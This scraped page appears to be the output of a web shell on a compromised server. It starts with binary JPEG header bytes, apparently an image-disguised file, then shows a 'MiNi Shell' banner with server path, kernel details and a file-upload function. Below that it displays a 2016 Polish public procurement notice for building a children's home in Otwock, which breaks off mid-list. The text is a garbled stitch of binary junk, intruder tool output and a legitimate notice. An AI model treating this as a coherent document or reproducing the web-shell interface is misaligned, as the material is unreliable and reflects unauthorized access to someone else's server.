JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160609/77569-N-2016.html

<p class="kh_header"><b>Otwock: Wykonanie wielobranżowych robót budowlano-instalacyjnych rozbudowy i przebudowy budynku przy ul. Ujejskiego 14 z przeznaczeniem na Dom dla Dzieci w Otwocku - placówkę opiekuńczo - wychowawczą  zapewniającą stały pobyt dla 14 dzieci wraz z opiekunami</b><br>
<b>Numer ogłoszenia: 77569 - 2016; data zamieszczenia: 09.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Domy dla Dzieci w Otwocku , Ul. Komunardów 10, 05-402 Otwock, woj. mazowieckie, tel. 0227792433, faks 0227884044.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pcpr@pcprotwock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Placówka opiekuńczo-wychowawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wielobranżowych robót budowlano-instalacyjnych rozbudowy i przebudowy budynku przy ul. Ujejskiego 14 z przeznaczeniem na Dom dla Dzieci w Otwocku - placówkę opiekuńczo - wychowawczą  zapewniającą stały pobyt dla 14 dzieci wraz z opiekunami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Wykonanie wielobranżowych robót budowlano-instalacyjnych rozbudowy i przebudowy budynku przy ul. Ujejskiego 14 z przeznaczeniem na Dom dla Dzieci w Otwocku - placówkę opiekuńczo - wychowawczą  zapewniającą stały pobyt dla 14 dzieci wraz z opiekunami, w szczególności: 
1) wybudowanie nowej części budynku zgodnie z dokumentacją projektową, 
o powierzchni użytkowej ok.140 m2; wykopanie i wykonanie fundamentów, postawienie ścian, wykonanie schodów i stropów żelbetowych, uzupełnienie stropu drewnianego w części istniejącej, wykonanie dachu, wykonanie balkonów i tarasu, wykonanie schodów zewnętrznych, usunięcie 4 szt. drzew;
2) przebudowa istniejącego budynku zgodnie z dokumentacją projektową; w szczególności roboty rozbiórkowe w części istniejącej, wyburzenie istniejącej klatki schodowej, likwidacja istniejącego wejścia do budynku, zmiana funkcji istniejących pomieszczeń;
3)  wykonanie wewnętrznych robót budowlanych wykończeniowych wraz z montażem stolarki wewnętrznej; wykonanie ścian działowych i sufitów, posadzek, ułożenie płytek 
i paneli; wykonanie tynków wewnętrznych i gładzi gipsowych; malowanie; zamontowanie stolarki okiennej i drzwiowej;  częściową wymianę stolarki w części istniejącej, 
4) wykonanie robót z zakresu instalacji sanitarnych, w tym wykonanie instalacji centralnego ogrzewania wraz z zakupem i montażem kotła grzewczego; instalacji i przyłączy wodociągowych i kanalizacyjnych, instalacji hydrantowej, instalacji i przyłączy gazowych;
5) wykonanie robót z zakresu instalacji elektrycznych, w tym oświetlenia awaryjnego 
i ewakuacyjnego oraz instalacji teletechnicznej;
6) wykonanie robót budowlanych zewnętrznych wraz z robotami elewacyjnymi; wykonanie tynków zewnętrznych; ocieplenie ścian i malowanie; odwodnienie dachu, obróbki blacharskie; 
7) wykonanie instalacji systemu sygnalizacji pożaru i oddymiania klatki schodowej i ścianki p.poż.;
8) wykonanie robót budowlanych zagospodarowania terenu, położenie kostki brukowej;
Roboty wchodzące w zakres przedmiotu zamówienia, o którym mowa w ust 1 i 2 niniejszego paragrafu stanowić mają kompleksową realizację przedsięwzięcia, pozwalającą na oddanie obiektu do użytkowania zgodnie z jego przeznaczeniem. 

2. Szczegółowy zakres robót określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robót. W przypadku wystąpienia nieujawnionych różnic w opisie przedmiotu zamówienia między dokumentacją projektową, a przedmiarem robót przyjmuje się, że opis zamówienia zawarty jest w  dokumentacji projektowej  ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki, 
na podstawie art. 67 ust. 1 pkt. 6 Ustawy. Zamówienie uzupełniające może zostać udzielone w terminie 3 lat od dnia udzielenia zamówienia podstawowego i może dotyczyć:
- wykonania ścian działowych, sufitów, posadzek,
- ułożenia płytek i paneli,
- wykonania  tynków wewnętrznych i gładzi  gipsowych,
- malowania,
- wykonania tynków zewnętrznych wraz z robotami elewacyjnymi,
- ocieplenia ścian i malowania,
- robót z zakresu  instalacji sanitarnych, 
- instalacji centralnego ogrzewania,
- instalacji  wodociągowych, kanalizacyjnych i gazowych, 
Wartość zamówienia uzupełniającego nie będzie przekraczać 50% wartości zamówienia podstawowego.
Roboty te zostaną wykonane z materiałów takich, jakie zostały użyte w zamówieniu podstawowym oraz zostaną wykonane metodą taką, jaką zastosowano przy realizacji zamówienia podstawowego. 
Cena za wykonanie wymienionych robót nie będzie wyższa niż ceny wykazane w ofercie  -Kosztorysie ofertowym przekazanym przez Wykonawcę, z którym zawarta została umowa.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.11.11.00-9, 45.11.12.20-6, 45.21.00.00-2, 45.42.11.52-4, 45.26.23.21-7, 45.40.00.00-1, 45.42.11.31-1, 44.22.00.00-8, 45.42.11.46-9, 45.43.00.00-0, 45.45.00.00-6, 45.41.00.00-4, 45.43.21.00-5, 45.43.10.00-7, 45.43.11.00-8, 45.43.12.00-9, 45.44.21.00-8, 45.33.22.00-5, 45.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium na cały okres związania ofertą, 
w wysokości: 15 000,00 zł (słownie: piętnaście tysięcy złotych). 
2. Z postępowania o udzielenie zamówienia zostanie wykluczony wykonawca, który nie wniesie wadium. 
3. Wadium może być wniesione w następujących formach: 
1) pieniądzu, 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3) gwarancjach bankowych, 
4) gwarancjach ubezpieczeniowych, 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
4. Wadium wnoszone w pieniądzu wnosi się wyłącznie przelewem na rachunek bankowy wskazany przez Zamawiającego. Nie jest dopuszczalna bezpośrednia wpłata kwoty wadium np. w kasie Zamawiającego lub banku. Zaleca się potwierdzenie kopi przelewu - za zgodność z oryginałem - zgodnie z zapisem art. 10 § 1 ust. 6 niniejszej SIWZ. 
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
6. Wadium w pieniądzu należy wpłacić na konto Zamawiającego: 
Nr 51 8023 0009 2001 0009 8573 0020 prowadzone przez Bank Spółdzielczy w Karczewie (na przelewach nr rachunku należy pisać w sposób ciągły - bez spacji)
z podaniem numeru przetargu PN Nr 1.DDD.2016.
7. Wadium wniesione przelewem na konto Zamawiającego uznane będzie za wniesione 
w terminie, jeżeli przed terminem składania ofert konto Zamawiającego będzie uznane kwotą wadium (decyduje data wpływu środków na rachunek Zamawiającego). 
8.Oryginał dokumentu potwierdzający wniesienie wadium w innych formach niż w pieniądzu należy dołączyć do oferty.
9. Wykonawca, który nie zabezpieczy oferty zaakceptowaną formą wadium, zostanie przez Zamawiającego wykluczony z postępowania zgodnie z art.24 ust.2 pkt.2 ustawy pzp.
10. Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodnie z art.46 ust.5 ustawy pzp.
11. Dokument poręczenia/gwarancyjny powinien przewidywać bezwarunkową utratę wadium
na rzecz Zamawiającego w przypadkach określonych w art.6 § 2 ust.6 i 7 niniejszej SIWZ. Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
12. Wadium wniesienie  w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwości roszczeń Zamawiającego, Wykonawca zostanie wykluczony z postępowania.
13.Wadium musi być ważne minimum  przez okres 30 dni ( na cały okres związania ofertą )  licząc od terminu składania ofert ( również dzień składania ofert).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że zrealizował zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył (został podpisany przez Zamawiającego i Wykonawcę końcowy protokół odbioru robót) - w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 roboty budowlanej polegającej na budowie, przebudowie  lub remoncie budynku o wartości brutto nie mniejszej niż 400 000,00 zł, obejmującej roboty ogólnobudowlane, elektryczne, gazowe, sanitarne.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca do realizacji przedmiotu zamówienia wyznaczy osoby spełniające poniższe wymogi: 
3.1) kierownik budowy posiada uprawnienia budowlane do kierowania robotami 
w specjalności konstrukcyjno-budowlanej, bez ograniczeń, zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające 
im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
3.2) kierownik robót budowlanych posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno -budowlanej, zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające 
im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
3.3) kierownik robót sanitarnych i gazowych, stosownie do zakresu wykonywanych prac posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sanitarnej i gazowej, zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie 
(Dz. U. z 2014 r. poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
3.4) kierownik robót elektrycznych posiada uprawnienia budowlane do kierowania robotami budowlanymi w zakresie instalacji elektrycznych, zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2014 r. poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz najważniejszych robót budowlanych wykonanych w okresie ostatnich pięciu lat 
przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, przedmiotu, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty 
te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Przez najważniejsze roboty należy rozumieć co najmniej 1 robotę budowlaną polegającą 
na budowie, przebudowie  lub remoncie budynku o wartości brutto nie mniejszej
niż 400 000,00 zł, obejmującej roboty ogólnobudowlane, elektryczne, gazowe, sanitarne.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu 
oraz do podpisania umowy (o ile nie wynika z dokumentów rejestracyjnych). Pełnomocnictwo musi być podpisane przez osoby uprawnione do reprezentowania Wykonawcy (podpisy i pieczęcie oryginalne) lub mieć postać aktu notarialnego 
albo notarialnie potwierdzonej kopii. 
2) dowód wniesienia wadium. Wadium wnoszone w gwarancjach lub/i poręczeniach należy składać w formie oryginału. 
informacja o zakresie zamówienia, który Wykonawca zamierza powierzyć podwykonawcom (Wykonawca wykonujący zamówienie wyłącznie siłami własnymi nie dołącza do oferty niniejszego formularza), 
2. Jeżeli Wykonawca powołuje się na zasoby podwykonawców na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, musi to wykazać na Formularzu nr 7. Wykonawca musi podać nazwy (firmy) takich podwykonawców oraz zakres realizowanych przez nich robót. Wykonawca wykonujący zamówienie wyłącznie siłami własnymi nie dołącza niniejszego formularza 
sporządzonego przez Wykonawcę szczegółowego zestawienia (spisu) wszystkich oświadczeń i dokumentów itp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia do umowy muszą być dokonane za zgodą obu stron, 
w formie pisemnej, pod rygorem nieważności.
2. Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie której dokona wyboru Wykonawcy. 
3. Zamawiający, przewiduje również możliwość dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1) zmiany zakresu lub sposobu wykonania zamówienia  spowodowane zmianą dokumentacji projektowej lub technicznej przez projektanta i zaakceptowanej przez Zamawiającego, które mogą spowodować rozszerzenie przedmiotu zamówienia.
2) konieczności zmiany, w tym w zakresie wysokości wynagrodzenia, związanej ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT) lub,
3) siły wyższej uniemożliwiającej  wykonanie przedmiotu umowy zgodnie z  ofertą i SIWZ, 
4. Zamawiający przewiduje możliwość zmiany terminu realizacji w przypadku:
1)	zaistnienia nieprzewidzianych utrudnień, związanych z konstrukcją budynku 
oraz w przypadku nieprzewidzianych, dodatkowych robót budowlanych;
2)	w przypadku sporządzenia protokołu konieczności na wykonanie robót koniecznych 
lub dodatkowych, wykonanie których stało się niezbędne do prawidłowego wykonania przedmiotu umowy zgodnie ze sztuką budowlaną;
3) konieczności wykonania robót zamiennych, niezbędnych dla prawidłowego i zgodnego 
z prawem budowlanym wykonania przedmiotu umowy;
4)  wstrzymania realizacji umowy przez Zamawiającego z przyczyn leżących po jego stronie;
5)  warunków atmosferycznych uniemożliwiających realizację robót;
6) wystąpienia okoliczności, których  strony umowy nie były w stanie przewidzieć, pomimo 
      zachowania należytej staranności;
